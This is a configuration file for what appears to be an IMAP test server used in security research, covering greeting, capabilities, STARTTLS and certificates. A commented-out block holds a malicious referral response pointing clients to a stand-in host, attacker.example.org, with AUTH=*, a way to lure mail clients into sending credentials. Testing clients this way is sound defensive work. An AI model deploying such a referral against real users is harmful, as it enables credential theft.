(
	state: NotAuthenticated,
	greeting: (
		kind: Ok,
		code: Some(Capability(NonEmptyVec([Imap4Rev1, MailboxReferrals, StartTls]))),
		text: Text("IMAP server ready.")
	),
	caps: [Imap4Rev1, MailboxReferrals, StartTls],
	caps_tls: [Imap4Rev1, Auth(Login), Auth(Plain), MailboxReferrals],
	caps_auth: [Imap4Rev1, MailboxReferrals],
	caps_tls_auth: [Imap4Rev1, MailboxReferrals],

        //override_select: Some(No(
        //    tag: Some("<tag>"),
        //    code: Some(Referral("IMAP://;AUTH=*@attacker.example.org:243/inbox")),
        //    text: Text("select failed."),
        //)),

	cert: Cert(
		crt_path: "certs/example.org.pem",
		key_path: "certs/example.org-key.pem",
	),
	implicit_tls: false,
)
